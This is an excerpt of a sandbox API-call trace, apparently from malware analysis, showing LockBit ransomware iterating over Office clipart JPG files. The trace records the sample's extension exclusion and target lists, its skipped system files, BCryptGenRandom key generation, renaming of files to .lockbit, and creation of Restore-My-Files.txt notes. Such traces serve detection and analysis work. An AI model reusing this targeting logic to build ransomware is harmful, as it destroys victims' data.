lpString2=".JPG") returned -1 [0143.813] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0143.813] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0143.814] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0143.814] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0143.814] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0143.814] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0143.814] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0143.814] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.814] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0143.814] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0143.814] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0143.814] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0143.814] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145904.JPG") returned 1 [0143.814] lstrcmpiW (lpString1="ntldr", lpString2="J0145904.JPG") returned 1 [0143.814] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145904.JPG") returned 1 [0143.814] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145904.JPG") returned -1 [0143.814] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145904.JPG") returned -1 [0143.814] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145904.JPG") returned 1 [0143.814] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145904.JPG") returned -1 [0143.814] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0143.814] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned=".JPG" [0143.814] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0143.814] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0143.814] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0143.814] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0143.815] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0143.815] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0143.816] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0143.816] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0143.816] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.lockbit") returned 72 [0143.816] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0143.816] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0143.816] malloc (_Size=0x40068) returned 0x3e70008 [0143.817] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=39542) returned 1 [0143.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0143.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0143.818] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0143.823] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.823] malloc (_Size=0xa6) returned 0x77d7a8 [0143.823] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0143.824] free (_Block=0x77d7a8) [0143.824] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0143.824] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0143.824] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0143.824] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0146142.JPG", cAlternateFileName="")) returned 1 [0143.824] lstrcmpiW (lpString1=".", lpString2="J0146142.JPG") returned -1 [0143.824] lstrcmpiW (lpString1="..", lpString2="J0146142.JPG") returned -1 [0143.824] PathFindExtensionW (pszPath="J0146142.JPG") returned=".JPG" [0143.824] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0143.824] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0143.825] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0143.825] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0143.825] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0143.825] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0143.825] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0143.825] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0143.825] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0143.825] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0143.825] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0143.826] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0143.826] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0143.827] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0143.827] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0146142.JPG") returned 1 [0143.827] lstrcmpiW (lpString1="ntldr", lpString2="J0146142.JPG") returned 1 [0143.827] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0146142.JPG") returned 1 [0143.827] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0146142.JPG") returned -1 [0143.827] lstrcmpiW (lpString1="autorun.inf", lpString2="J0146142.JPG") returned -1 [0143.827] lstrcmpiW (lpString1="thumbs.db", lpString2="J0146142.JPG") returned 1 [0143.827] lstrcmpiW (lpString1="iconcache.db", lpString2="J0146142.JPG") returned -1 [0143.827] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0143.827] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned=".JPG" [0143.827] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0143.827] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0143.827] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0143.827] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0143.828] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0143.828] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0143.828] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0143.828] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0143.828] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0143.828] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.lockbit") returned 72 [0143.828] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0143.829] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0143.829] malloc (_Size=0x40068) returned 0x3ef0008 [0143.829] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=46508) returned 1 [0143.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0143.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0143.830] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0144.164] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.164] malloc (_Size=0xa6) returned 0x77d7a8 [0144.164] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.307] free (_Block=0x77d7a8) [0144.307] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.307] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.307] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.307] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f27470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaa9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0148309.JPG", cAlternateFileName="")) returned 1 [0144.307] lstrcmpiW (lpString1=".", lpString2="J0148309.JPG") returned -1 [0144.307] lstrcmpiW (lpString1="..", lpString2="J0148309.JPG") returned -1 [0144.307] PathFindExtensionW (pszPath="J0148309.JPG") returned=".JPG" [0144.308] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.308] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0144.308] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0144.309] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0144.309] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0144.309] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0144.309] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0144.309] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0144.309] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.309] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0144.309] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0144.309] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0148309.JPG") returned 1 [0144.309] lstrcmpiW (lpString1="ntldr", lpString2="J0148309.JPG") returned 1 [0144.309] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0148309.JPG") returned 1 [0144.309] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0148309.JPG") returned -1 [0144.309] lstrcmpiW (lpString1="autorun.inf", lpString2="J0148309.JPG") returned -1 [0144.309] lstrcmpiW (lpString1="thumbs.db", lpString2="J0148309.JPG") returned 1 [0144.310] lstrcmpiW (lpString1="iconcache.db", lpString2="J0148309.JPG") returned -1 [0144.310] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.310] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned=".JPG" [0144.310] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0144.310] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0144.310] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0144.310] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0144.310] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0144.310] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0144.310] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0144.310] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0144.310] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0144.310] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0144.311] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0144.311] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0144.311] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0144.311] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0144.311] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0144.311] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0144.311] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG.lockbit") returned 72 [0144.311] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.312] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.312] malloc (_Size=0x40068) returned 0x3df0008 [0144.312] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=43674) returned 1 [0144.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.313] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.318] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.318] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.321] free (_Block=0x1fa2ed8) [0144.321] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.321] 